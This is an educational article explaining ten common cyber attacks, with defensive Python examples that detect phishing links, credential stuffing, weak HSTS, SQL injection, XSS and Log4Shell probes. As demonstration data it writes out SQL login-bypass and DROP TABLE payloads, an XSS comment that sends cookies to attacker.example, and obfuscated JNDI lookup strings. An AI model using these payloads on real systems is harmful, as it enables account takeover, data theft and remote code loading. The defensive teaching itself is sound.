The 10 Most Common Cyber Attacks Explained
Learn about the 10 most prevalent cyber attacks targeting individuals and businesses in 2026: how they work, real-world examples, and how to defend against each one.
1. Phishing Attacks
Phishing remains the most common and successful initial attack vector, and it consistently ranks among the top ways attackers gain their first foothold in Verizon's annual Data Breach Investigations Report. It works by impersonating a trusted entity (your bank, your employer, a popular service) to trick you into revealing sensitive information or clicking malicious links.
How it works: An attacker crafts an email, text message (smishing), or voice call (vishing) that appears to come from a legitimate source. The message typically creates urgency: "Your account has been compromised," "Payment failed," or "Verify your identity within 24 hours." The link leads to a fake login page that captures your credentials, or the attachment contains malware.
Modern phishing is sophisticated. Attackers use AI to generate grammatically perfect emails, clone legitimate login pages pixel by pixel, and spoof or closely imitate sender addresses (deceptive display names, look-alike domains) so the email appears to come from a trusted contact. Spear phishing targets specific individuals using personal information gathered from social media and public records, and phishing kits that proxy the real login page can capture one-time codes and session cookies along with the password.
How to defend yourself:
- Check where a link actually goes before clicking: hover on desktop, long-press on mobile, and compare the real hostname with the one the link text claims
- Never enter credentials after clicking an email link; navigate to the site directly or use a bookmark
- Be suspicious of urgency, threats, or too-good-to-be-true offers
- Use email filters and report phishing attempts
- Enable 2FA so stolen credentials alone aren't enough, and prefer phishing-resistant methods (passkeys or FIDO2 security keys) over SMS and app codes, which proxy-style phishing kits relay to the real site in real time
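The "check where the link actually goes" advice can be automated for a mail gateway or a triage script. The following is an added example, not code from the original article: it extracts every link from an HTML message and flags the three deceptions described above (link text naming one host while the href goes to another, a brand name used as a subdomain of an unrelated registrable domain, and punycode labels that can hide homoglyphs). The sample message, the `KNOWN_DOMAINS` allowlist and the two-label `registrable_domain()` shortcut are assumptions made for the example; production code should use the Public Suffix List.

```python
"""Flag deceptive links in an e-mail body.
Added example; the message below is constructed, not a real phishing e-mail."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Brands this mailbox legitimately receives links for (assumed allowlist).
KNOWN_DOMAINS = {"paypal.com", "microsoft.com"}


def registrable_domain(host):
    """Last two labels of a hostname. Simplification: real code should use the
    Public Suffix List so that e.g. 'example.co.uk' is handled correctly."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs from <a> tags."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def analyze_link(href, text):
    """Return the reasons a link looks deceptive (empty list = nothing found)."""
    findings = []
    parsed = urlparse(href)
    host = (parsed.hostname or "").lower()
    dest = registrable_domain(host)

    # 1. The visible text looks like a URL but names a different registrable domain.
    shown = urlparse(text if "://" in text else "http://" + text)
    shown_host = (shown.hostname or "").lower()
    if shown_host and "." in shown_host and registrable_domain(shown_host) != dest:
        findings.append(f"text shows {shown_host} but href goes to {host}")

    # 2. A known brand appears inside the host, but the registrable domain is
    #    not the brand's (e.g. paypal.com.account-verify.example).
    for brand in KNOWN_DOMAINS:
        if brand.split(".")[0] in host and dest != brand:
            findings.append(f"host {host} imitates {brand} but is registered as {dest}")

    # 3. Punycode labels can hide homoglyph look-alikes (e.g. Cyrillic letters).
    if any(label.startswith("xn--") for label in host.split(".")):
        findings.append(f"host {host} uses punycode (possible homoglyph)")

    # 4. A login link over plain HTTP.
    if parsed.scheme == "http":
        findings.append("link is plain http, not https")
    return findings


def scan_email(html_body):
    """Map each href in the message to its findings."""
    collector = LinkCollector()
    collector.feed(html_body)
    return {href: analyze_link(href, text) for href, text in collector.links}


# Constructed sample message (not a real phishing e-mail).
SAMPLE_EMAIL = """
<p>Your account has been limited. Verify within 24 hours:</p>
<a href="http://paypal.com.account-verify.example/login">https://www.paypal.com/signin</a>
<p>Questions? See <a href="https://www.microsoft.com/support">our help center</a>.</p>
"""

if __name__ == "__main__":
    for href, reasons in scan_email(SAMPLE_EMAIL).items():
        print(href, "->", reasons or "ok")
```

Run it and the first link is reported three times over (text/href mismatch, brand used as a subdomain, plain HTTP) while the genuine Microsoft link passes. The checks are heuristics: they catch the common tricks, not a determined attacker using a freshly registered unrelated domain with a bland link text.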
2. Ransomware
Ransomware encrypts your files and demands payment, typically in cryptocurrency, for the decryption key. It's one of the most financially devastating attacks: ransom demands against businesses routinely run to six or seven figures, and the cost of downtime, data loss, and recovery usually far exceeds the ransom itself. Most current ransomware groups also steal data before encrypting it and threaten to publish it ("double extortion"), so backups restore operations but don't remove that leverage.
How it works: Ransomware typically arrives through phishing emails, compromised websites, or exploited vulnerabilities in unpatched software. Once executed, it rapidly encrypts files on the local system and any accessible network drives. The victim sees a ransom note demanding payment, usually with a deadline after which the ransom increases or the decryption key is destroyed.
Notable examples: The WannaCry attack (2017) infected over 200,000 computers across 150 countries in a single day, spreading as a worm through the EternalBlue SMBv1 vulnerability (MS17-010) that Microsoft had patched two months earlier. The Colonial Pipeline attack (2021) shut down the largest fuel pipeline in the United States, causing fuel shortages across the East Coast; the intrusion began with a compromised VPN password on an account that had no multi-factor authentication. The MOVEit campaign (2023) hit over 2,000 organizations when the Cl0p group exploited a zero-day in the MOVEit Transfer file-transfer product to steal data for extortion, without encrypting anything.
How to defend yourself:
- Maintain regular backups following the 3-2-1 rule (three copies, on two different media, one of them offline or off-site) and test that you can actually restore from them
- Keep all software and operating systems updated
- Use email filtering to block malicious attachments
- Don't enable macros in documents from unknown sources
- Consider endpoint detection and response (EDR) software for businesses
3. Credential Stuffing
Credential stuffing is an automated attack that tests stolen username/password pairs across multiple websites, exploiting the widespread habit of password reuse. It's the reason why a breach at one service can compromise your accounts on completely unrelated platforms.
How it works: Attackers obtain databases of stolen credentials from data breaches; billions of such records circulate on criminal forums. They load these into automated tools that attempt logins across hundreds of popular services (banks, email providers, e-commerce sites, streaming services). With password reuse rates estimated at 50 to 65%, even a small hit rate against a large list yields thousands of compromised accounts.
Scale of the problem: Akamai has reported tens of billions of credential stuffing login attempts per year across its network. The attacks use residential proxy networks to spread attempts across many IP addresses, evading per-IP rate limiting and blocking, so each attempt appears to come from a different legitimate user.
How to defend yourself:
- Use unique passwords for every account (password manager essential)
- Enable 2FA on all important accounts
- Monitor breach notification services like Have I Been Pwned
- If you're notified of a breach, change that password immediately, and change it anywhere else you reused it
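On the defending side, the proxy trick described above is exactly what breaks naive per-IP blocking, so detection has to look at the aggregate. The following is an added example, not code from the original article: it runs over constructed authentication log lines and raises three signals, one source hitting many accounts (the classic tool), a campaign spread across many IPs with an abnormal failure rate, and a single automation user-agent shared by many IPs. The log format, field names and thresholds are assumptions for the example and would be tuned to a real service's baseline.

```python
"""Detect credential stuffing in authentication logs.
Added example with constructed log lines; the format and thresholds are
assumptions, not those of any particular product."""
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) '
    r'result=(?P<result>OK|FAIL) ua="(?P<ua>[^"]*)"$'
)

# Thresholds (assumed; tune to the service's real baseline).
NOISY_IP_MIN_USERS = 5       # one IP failing against this many distinct users
CAMPAIGN_MIN_FAILS = 20      # minimum failed logins to call something a campaign
CAMPAIGN_FAIL_RATIO = 0.8    # share of all attempts that failed
CAMPAIGN_MIN_IPS = 10        # failures spread across at least this many IPs
UA_MIN_IPS = 10              # one exact user-agent string seen from this many IPs


def parse(lines):
    """Yield parsed events, skipping malformed lines instead of crashing."""
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            yield m.groupdict()


def detect(lines):
    events = list(parse(lines))
    fails = [e for e in events if e["result"] == "FAIL"]

    # Signal 1: one source tries many different accounts (single-IP tool).
    users_per_ip = defaultdict(set)
    for e in fails:
        users_per_ip[e["ip"]].add(e["user"])
    noisy_ips = sorted(ip for ip, users in users_per_ip.items()
                       if len(users) >= NOISY_IP_MIN_USERS)

    # Signal 2: proxy-distributed campaign. Every IP looks harmless on its own,
    # but the aggregate shows many failures from many IPs at once.
    fail_ips = {e["ip"] for e in fails}
    fail_ratio = len(fails) / len(events) if events else 0.0
    campaign = (len(fails) >= CAMPAIGN_MIN_FAILS
                and fail_ratio >= CAMPAIGN_FAIL_RATIO
                and len(fail_ips) >= CAMPAIGN_MIN_IPS)

    # Signal 3: the same exact user-agent from many IPs (automation fingerprint).
    ips_per_ua = defaultdict(set)
    for e in fails:
        ips_per_ua[e["ua"]].add(e["ip"])
    shared_uas = sorted(ua for ua, ips in ips_per_ua.items() if len(ips) >= UA_MIN_IPS)

    return {
        "events": len(events),
        "failed": len(fails),
        "fail_ratio": round(fail_ratio, 2),
        "noisy_ips": noisy_ips,
        "campaign": campaign,
        "shared_user_agents": shared_uas,
    }


def _line(ts, ip, user, result, ua):
    return f'{ts} ip={ip} user={user} result={result} ua="{ua}"'


# Constructed sample: three normal logins, one noisy IP, then a proxy-distributed
# campaign where each of 30 IPs tries exactly one account with the same tool UA.
SAMPLE_LOG = [
    _line("2026-01-15T10:00:01Z", "192.0.2.10", "alice", "OK", "Mozilla/5.0 (Windows NT 10.0) Firefox/125.0"),
    _line("2026-01-15T10:00:05Z", "192.0.2.11", "bob", "OK", "Mozilla/5.0 (Macintosh) Safari/605.1"),
    _line("2026-01-15T10:00:09Z", "192.0.2.12", "carol", "OK", "Mozilla/5.0 (X11; Linux) Chrome/124.0"),
]
SAMPLE_LOG += [_line("2026-01-15T10:01:00Z", "203.0.113.9", f"user{i}", "FAIL", "curl/8.0")
               for i in range(6)]
SAMPLE_LOG += [_line("2026-01-15T10:02:00Z", f"198.51.100.{i}", f"victim{i}", "FAIL", "python-requests/2.31")
               for i in range(1, 31)]

if __name__ == "__main__":
    print(detect(SAMPLE_LOG))
```

Signal 2 is the one that matters against residential proxies, and it is also the one with false positives: a password-policy change or a broken client release produces the same failure spike, so it should trigger step-up authentication or a CAPTCHA rather than a hard block.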
4. Man-in-the-Middle Attacks
In a man-in-the-middle (MitM) attack, an attacker secretly intercepts and potentially alters communications between two parties who believe they're communicating directly. This can happen on unsecured Wi-Fi networks, through DNS hijacking, or via compromised routers.
How it works: The attacker positions themselves between you and the server you're communicating with. In the classic scenario, you connect to a public Wi-Fi network at a coffee shop. The attacker is running that network (or has compromised it) and can see all unencrypted traffic: login credentials, emails, messages. More sophisticated MitM attacks target HTTPS itself, through SSL stripping (keeping you on plain HTTP so there is nothing to decrypt) or rogue certificates (which only work if a certificate authority your device trusts has been compromised or a malicious root certificate has been installed on the device).
Common MitM techniques:
- Evil twin attacks: Setting up a fake Wi-Fi access point with a familiar name ("Starbucks_WiFi_Free")
- ARP spoofing: Tricking devices on a local network into sending traffic through the attacker's machine
- SSL stripping: Downgrading HTTPS connections to HTTP, removing encryption
- DNS spoofing: Redirecting domain lookups to attacker-controlled servers
How to defend yourself:
- Use a VPN on public Wi-Fi networks (this moves trust to the VPN provider, but it hides your traffic from whoever runs the local network)
- Verify HTTPS in the address bar before entering sensitive information; a "Not secure" label or a plain http:// login page on a site that is normally encrypted is the signature of SSL stripping
- Avoid transmitting sensitive data on public Wi-Fi whenever possible
- Use services that implement HSTS (HTTP Strict Transport Security), which tells your browser to refuse plain HTTP to that site for as long as the policy lasts
- Keep your devices' certificate stores updated
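HSTS is the control that defeats SSL stripping, but only when the header is configured well and the browser has already seen it. The following is an added example, not code from the original article: it parses a `Strict-Transport-Security` header, reports the weaknesses a reviewer would flag (short max-age, no includeSubDomains, no preload), and models a browser's HSTS cache to show which hosts would be upgraded to HTTPS and which a stripping attack could still reach. The hostnames and headers are constructed for the example.

```python
"""Evaluate an HSTS header and model what it buys against SSL stripping.
Added example; the hosts and headers below are constructed."""
import re
from datetime import datetime, timedelta, timezone

ONE_YEAR = 365 * 24 * 3600


def parse_hsts(header):
    """Parse 'max-age=31536000; includeSubDomains; preload' into a dict.
    Directive names are case-insensitive; unknown directives are ignored."""
    policy = {"max_age": None, "include_subdomains": False, "preload": False}
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        name = name.lower()
        if name == "max-age":
            m = re.fullmatch(r'"?(\d+)"?', value.strip())
            if m:
                policy["max_age"] = int(m.group(1))
        elif name == "includesubdomains":
            policy["include_subdomains"] = True
        elif name == "preload":
            policy["preload"] = True
    return policy


def hsts_weaknesses(header):
    """Return the configuration problems a reviewer would flag."""
    p = parse_hsts(header)
    problems = []
    if p["max_age"] is None:
        problems.append("missing max-age: header is invalid and browsers ignore it")
    elif p["max_age"] == 0:
        problems.append("max-age=0 removes the policy instead of enforcing it")
    elif p["max_age"] < ONE_YEAR:
        problems.append("max-age below one year: policy lapses quickly and preload requires at least one year")
    if not p["include_subdomains"]:
        problems.append("no includeSubDomains: a stripped request to a subdomain can still go over plaintext")
    if not p["preload"]:
        problems.append("no preload: the very first visit is unprotected until the header has been seen once")
    return problems


class HstsCache:
    """Minimal model of a browser's HSTS store: host -> (expiry, includeSubDomains)."""

    def __init__(self, now=None):
        self.now = now or datetime.now(timezone.utc)
        self.entries = {}

    def observe(self, host, header):
        """Record a policy. Real browsers only honor the header on an HTTPS
        response; this model assumes the caller checked that."""
        p = parse_hsts(header)
        if p["max_age"] is None:
            return
        if p["max_age"] == 0:
            self.entries.pop(host.lower(), None)
            return
        self.entries[host.lower()] = (self.now + timedelta(seconds=p["max_age"]),
                                      p["include_subdomains"])

    def upgrades(self, host):
        """Would the browser force https:// for this host right now?
        Walk from the host up through its parent domains."""
        host = host.lower()
        labels = host.split(".")
        for i in range(len(labels)):
            candidate = ".".join(labels[i:])
            entry = self.entries.get(candidate)
            if entry is None:
                continue
            expiry, include_sub = entry
            if expiry <= self.now:
                continue
            if candidate == host or include_sub:
                return True
        return False


if __name__ == "__main__":
    for hdr in ("max-age=300", "max-age=63072000; includeSubDomains; preload"):
        print(hdr, "->", hsts_weaknesses(hdr) or "ok")
    cache = HstsCache()
    cache.observe("bank.example", "max-age=31536000; includeSubDomains")
    for h in ("bank.example", "login.bank.example", "other.example"):
        print(h, "upgraded:", cache.upgrades(h))
```

The cache walk shows the practical gap: `other.example` is never upgraded because the browser has no policy for it, which is why preloading (shipping the policy inside the browser) matters for the first visit, and why a VPN still has a role on networks you don't trust.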
5. SQL Injection
SQL injection (SQLi) is a web application attack where an attacker inserts malicious SQL code into input fields to manipulate the application's database. It's been one of the top web vulnerabilities for over two decades and remains in the OWASP Top 10.
How it works: Many websites store user data in SQL databases and construct database queries using user input. If the application builds the query by concatenating that input into the SQL string, an attacker can inject SQL syntax. For example, entering ' OR '1'='1 into the password field of a login form can bypass authentication entirely, and '; DROP TABLE users;-- could delete the whole users table on databases and drivers that accept multiple statements in one call.
Impact: Successful SQL injection can allow attackers to read the entire database (including user credentials, personal data, and credit card numbers), modify or delete data, execute administrative operations, and in some cases, gain access to the underlying operating system.
How to defend yourself (as a user):
- You can't directly prevent SQLi; it's a server-side vulnerability
- Choose services that demonstrate good security practices
- Use unique passwords so a SQLi breach at one site doesn't cascade
- Monitor your accounts for unauthorized activity
- For developers: use parameterized (prepared) queries for every statement that touches user input, run the application with a least-privilege database account, and treat input validation and ORM query builders as defense in depth rather than the primary control
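The difference between the two query styles is easiest to see side by side. The following is an added example, not code from the original article: it builds an in-memory SQLite database with constructed users, implements the login check once with string concatenation and once with a parameterized query, and runs the same payloads from the text through both.

```python
"""SQL injection against a login query: vulnerable form beside the fixed form.
Added example on an in-memory SQLite database with constructed users."""
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    # Constructed test data. Real systems store salted password hashes, never plaintext.
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "correct horse battery staple"), ("alice", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    """String concatenation: user input becomes part of the SQL grammar."""
    sql = (f"SELECT id, username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone()


def login_safe(conn, username, password):
    """Parameterized query: the driver sends the values separately from the
    statement, so a quote in the input is data, never syntax."""
    sql = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


def demo():
    """Run the same inputs through both implementations and collect the rows."""
    conn = make_db()
    payload = "' OR '1'='1"
    return {
        # password = '' OR '1'='1' -> AND binds tighter, so every row matches
        "vulnerable_bypass": login_vulnerable(conn, "admin", payload),
        "safe_same_input": login_safe(conn, "admin", payload),
        # username = 'admin'-- comments out the password check entirely
        "vulnerable_comment_trick": login_vulnerable(conn, "admin'--", "anything"),
        "safe_comment_trick": login_safe(conn, "admin'--", "anything"),
        "safe_real_password": login_safe(conn, "alice", "hunter2"),
    }


if __name__ == "__main__":
    for name, row in demo().items():
        print(f"{name}: {row}")
```

Two details worth noticing. The `' OR '1'='1` payload only works in the password field because SQL's AND binds tighter than OR; in the username field the same text would still require a matching password, which is why real attackers reach for the comment trick instead. And Python's `sqlite3` driver refuses stacked statements in `execute()`, so the `DROP TABLE` payload from the text raises an error here rather than deleting anything; that is a property of this driver, not a defense, and other database drivers happily run it.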
6. Cross-Site Scripting (XSS)
Cross-site scripting (XSS) attacks inject malicious scripts into web pages viewed by other users. When the victim's browser renders the page, the script executes as if it were legitimate site code, potentially stealing session tokens, cookies, or other sensitive data.
How it works: An attacker finds a way to inject JavaScript into a web application, through comment fields, search boxes, URL parameters, or other user inputs that the application echoes back into a page without encoding it. When another user views the page containing the injected script, their browser executes it with that site's privileges. The script can steal the user's session cookie (allowing the attacker to impersonate them) unless the cookie is marked HttpOnly, perform actions in the user's name, redirect them to phishing sites, or capture their keystrokes.
Types of XSS:
- Stored XSS: The malicious script is permanently stored on the target server (in a database, forum post, or comment)
- Reflected XSS: The script is reflected off a web application in search results, error messages, or URL parameters
- DOM-based XSS: The vulnerability exists in client-side code rather than server-side
How to defend yourself:
- Keep your browser updated; modern browsers enforce the defenses a site ships (Content Security Policy, SameSite cookies) and receive fixes for bypasses
- Use browser extensions like NoScript or uBlock Origin
- Be cautious of suspicious links, especially those with unusual URL parameters
- Log out of sensitive services when not in use (limits session theft impact)
- For developers: encode output for the context it lands in (HTML body, attribute, URL, JavaScript), mark session cookies HttpOnly, and deploy a Content Security Policy
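The developer-side fix is output encoding, and the common mistake is applying one encoding to every context. The following is an added example, not code from the original article: it renders a constructed attacker comment into a page template twice, once raw (stored XSS) and once with context-aware encoding, then parses both outputs the way a browser tokenizes them to report what would actually execute. The comment, the template and the allowed URL schemes are assumptions for the example.

```python
"""Stored XSS: a comment rendered raw beside the same comment rendered with
context-aware encoding, plus a small parser that reports what would execute.
Added example; the comment below is constructed."""
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

ALLOWED_LINK_SCHEMES = {"http", "https"}


def render_comment_vulnerable(author, text, website):
    """Interpolates user data straight into HTML: classic stored XSS."""
    return (f'<div class="comment"><a href="{website}" title="{author}">{author}</a>'
            f'<p>{text}</p></div>')


def safe_url(url):
    """URL context: escaping is not enough, because 'javascript:alert(1)'
    contains nothing to escape. Allow only http(s) and replace anything else."""
    scheme = urlparse(url.strip()).scheme.lower()
    return url if scheme in ALLOWED_LINK_SCHEMES else "#"


def _esc(s):
    """HTML body and attribute contexts: encode < > & " and ' so the browser
    treats them as text, not markup."""
    return html.escape(s, quote=True)


def render_comment_safe(author, text, website):
    return (f'<div class="comment"><a href="{_esc(safe_url(website))}" title="{_esc(author)}">'
            f'{_esc(author)}</a><p>{_esc(text)}</p></div>')


class ScriptFinder(HTMLParser):
    """Tokenize rendered HTML the way a browser would and record anything that
    would run script: <script> elements, on* handler attributes, javascript: URLs."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script element")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{tag}: event handler {name}")
            elif name in ("href", "src") and (value or "").strip().lower().startswith("javascript:"):
                self.findings.append(f"{tag}: javascript: URL in {name}")


def live_script(rendered_html):
    finder = ScriptFinder()
    finder.feed(rendered_html)
    return finder.findings


# Constructed attacker comment that abuses three contexts at once:
# an attribute (title), the HTML body (text) and a URL (website).
ATTACK = {
    "author": 'Mallory" onmouseover="alert(document.cookie)',
    "text": "<script>fetch('https://attacker.example/?c='+document.cookie)</script>",
    "website": "javascript:alert(document.cookie)",
}

if __name__ == "__main__":
    for label, render in (("raw", render_comment_vulnerable), ("encoded", render_comment_safe)):
        out = render(**ATTACK)
        print(label, "->", live_script(out) or "nothing executes")
        print("   ", out)
```

The raw rendering yields three executable findings (a `javascript:` href, an injected `onmouseover` handler, and a `<script>` element); the encoded rendering yields none, and the attacker's text is displayed literally. Note that the URL context needed a scheme check on top of escaping; a JavaScript-string context would need a different encoder again, which is why templating engines that auto-escape per context are preferable to hand-rolled concatenation.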
7. DoS and DDoS Attacks
Denial of Service (DoS) and Distributed Denial of Service (DDoS) attacks overwhelm a target system with traffic, making it unavailable to legitimate users. While these primarily target businesses and infrastructure, they can affect anyone who depends on the targeted service.
How it works: A DoS attack floods a server with requests from a single source. A DDoS attack amplifies this by using thousands or millions of compromised devices (a botnet) to generate traffic simultaneously, often bouncing small spoofed requests off misconfigured servers that reply with much larger responses (reflection and amplification). The target can't cheaply distinguish legitimate requests from attack traffic and becomes overwhelmed: slow, unresponsive, or completely offline.
Scale: The largest modern DDoS attacks exceed 1 terabit per second, and the biggest publicly reported ones have grown well past 3 Tbps. Even major cloud providers and CDNs can be challenged by attacks at this scale.
Real-world impact: DDoS attacks have disrupted banking services, taken gaming networks offline, affected healthcare systems, and been used as smokescreens for other attacks. Some attackers demand ransom to stop the attack, combining DDoS with extortion.
How to defend yourself:
- Individual users typically aren't direct DDoS targets
- Businesses should use DDoS mitigation services (Cloudflare, AWS Shield, Akamai)
- Ensure IoT devices on your network are secured โ compromised IoT devices are commonly recruited into botnets
- Diversify services so a DDoS attack on one provider doesn't take down everything you depend on
8. Malware and Trojans
Malware is a broad category encompassing any software designed to harm, exploit, or otherwise compromise a computer system. Trojans specifically disguise themselves as legitimate software to trick users into installing them.
Common malware types:
- Trojans: Disguised as legitimate software (a free game, a cracked application, a fake antivirus tool). Once installed, they create backdoors, steal data, or download additional malware.
- Spyware: Silently monitors your activities (keystrokes, browsing history, passwords, screenshots) and sends the data to the attacker.
- Adware: Displays unwanted advertisements and may redirect your searches. Less dangerous than other malware but often bundled with spyware.
- Worms: Self-replicating malware that spreads across networks without user interaction. A single infected device can compromise an entire network.
- Rootkits: Deeply embedded malware that hides itself from the operating system and antivirus software. Extremely difficult to detect and remove.
How malware spreads: Email attachments, malicious downloads, compromised websites, infected USB drives, software vulnerabilities, and malicious ads (malvertising).
How to defend yourself:
- Only download software from official sources and app stores
- Keep your operating system and antivirus software updated
- Don't open email attachments from unknown senders
- Use an ad blocker to prevent malvertising
- Be skeptical of "free" versions of paid software; they're often trojan-laden
- Regularly scan your devices with updated security software
9. Social Engineering
Social engineering attacks manipulate people rather than technology. They exploit human psychology (trust, fear, urgency, curiosity, helpfulness) to trick victims into compromising their own security.
Common social engineering techniques:
- Pretexting: The attacker creates a fabricated scenario to gain trust. "Hi, I'm from IT support. We detected unusual activity on your account. I need to verify your credentials to fix it."
- Baiting: Leaving infected USB drives or devices in public places, relying on curiosity. A USB drive labeled "Salary Information Q4" found in a parking lot has a good chance of being plugged in by someone.
- Quid pro quo: Offering something in exchange for information. "I'll give you free antivirus software if you disable your firewall for the installation."
- Tailgating/Piggybacking: Following authorized personnel through secured doors. "Hold the door for me? My badge isn't working."
- Watering hole attacks: Compromising websites that a specific group frequently visits, infecting visitors automatically.
Why it works: Humans are wired for social cooperation. We want to be helpful, we respect authority, and we respond to urgency. Skilled social engineers exploit these instincts in ways that bypass rational thought.
How to defend yourself:
- Verify identity before sharing any information, especially unexpected requests
- Be suspicious of urgency; legitimate organizations rarely demand that you act within minutes, and a genuine request survives the delay it takes to verify it
- Establish verification procedures (call back using official numbers, not numbers provided by the caller)
- In organizations, conduct regular social engineering awareness training
- Trust but verify: even if someone seems trustworthy, confirm unusual requests through independent channels
10. Zero-Day Exploits
A zero-day exploit targets a software vulnerability that the vendor doesn't yet know about, or hasn't yet fixed, meaning the vendor has had zero days to produce a patch. These are among the most dangerous attacks because no patch exists at the time of exploitation.
How it works: Someone discovers a vulnerability in widely used software. A researcher following coordinated disclosure reports it to the vendor; an attacker (or a broker who sells to attackers) instead develops an exploit. Because no patch is available, every user of that software is exposed until the vendor ships one. Zero-day exploits are extremely valuable on the grey and black markets; a full exploit chain for iOS or Windows can sell for $1 million or more.
Recent examples: The Log4Shell vulnerability (CVE-2021-44228) in the Apache Log4j library affected millions of systems worldwide, and because the library is embedded in so many products, exploitation continued for months after the fix was released. The MOVEit zero-day (2023) was exploited by the Cl0p group to steal data from thousands of organizations before a patch was available.
How to defend yourself:
- Keep all software updated; once a patch is released, apply it immediately, because a zero-day becomes an n-day that far more attackers can use the moment the fix is public
- Use software with a strong security track record and active development
- Employ defense-in-depth strategies โ don't rely on a single layer of security
- Use endpoint protection that includes behavioral detection (not just signature-based)
- Minimize your attack surface by uninstalling software you don't use
- For businesses: implement network segmentation and zero-trust architecture to limit the impact of any single compromise
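Behavioral detection, as opposed to waiting for a patch, is the practical response while a zero-day is being exploited, and the Log4Shell example above shows why it has to be smarter than a string match. The following is an added example, not code from the original article: it scans constructed web-server log lines for Log4Shell probes, first collapsing the Log4j lookup tricks attackers used to hide `${jndi:` from naive filters (`${lower:j}`, `${upper:n}`, and the `${...:-default}` form), then matching the normalized line. The log lines are constructed, and the normalizer covers only the lookup forms named in the comments.

```python
"""Detect Log4Shell (CVE-2021-44228) probes in request logs, including the
obfuscated forms that defeat a plain '${jndi:' grep.
Added example; the log lines are constructed."""
import re

INNERMOST = re.compile(r"\$\{([^{}]*)\}")   # a ${...} with no nested braces


def _resolve(content):
    """Resolve one innermost ${...} lookup for the obfuscation forms commonly
    seen in the wild. Returns None when the lookup should be left alone."""
    lower = content.lower()
    if lower.startswith("jndi:"):
        return None                          # the payload itself; keep it
    if ":-" in content:                      # ${anything:-default} -> default
        return content.split(":-", 1)[1]
    if lower.startswith("lower:"):           # ${lower:J} -> j
        return content[6:].lower()
    if lower.startswith("upper:"):           # ${upper:n} -> N
        return content[6:].upper()
    return None                              # e.g. ${amount}: unknown, unchanged


def normalize(s, max_rounds=50):
    """Repeatedly collapse innermost lookups until nothing changes."""
    for _ in range(max_rounds):
        changed = False

        def sub(m):
            nonlocal changed
            r = _resolve(m.group(1))
            if r is None:
                return m.group(0)
            changed = True
            return r

        s = INNERMOST.sub(sub, s)
        if not changed:
            break
    return s


JNDI_RE = re.compile(r"\$\{jndi:", re.IGNORECASE)


def is_log4shell_probe(line):
    return JNDI_RE.search(normalize(line)) is not None


def scan(lines):
    """Return (line number, normalized line) for every suspicious entry."""
    return [(n, normalize(line)) for n, line in enumerate(lines, 1)
            if is_log4shell_probe(line)]


# Constructed access-log lines: one benign, four probes of increasing
# obfuscation, and one benign line that merely contains a ${...} string.
SAMPLE_LOG = [
    '203.0.113.7 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.8 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "${${lower:j}${upper:n}di:ldap://attacker.example/a}"',
    '203.0.113.10 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/a}"',
    '203.0.113.11 - - "GET /?x=${${env:NOPE:-j}ndi:dns://attacker.example} HTTP/1.1" 404 "-"',
    '203.0.113.12 - - "GET / HTTP/1.1" 200 "price is ${amount} USD"',
]

if __name__ == "__main__":
    for n, normalized in scan(SAMPLE_LOG):
        print(f"line {n}: {normalized}")
```

Lines 2 to 5 are reported and lines 1 and 6 are not; the fourth and fifth would slip past a literal `${jndi:` search. This is a detection for exploitation attempts in logs, useful for scoping exposure and for blocking at a proxy; it is not a substitute for finding and updating every copy of the vulnerable library.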
Understanding these ten attack types gives you a framework for thinking about cybersecurity threats. You don't need to become a security expert, but knowing what you're up against helps you make informed decisions about protecting your digital life. Start with the fundamentals (strong unique passwords, 2FA, updates, backups, and healthy skepticism) and you'll be well-defended against the vast majority of attacks.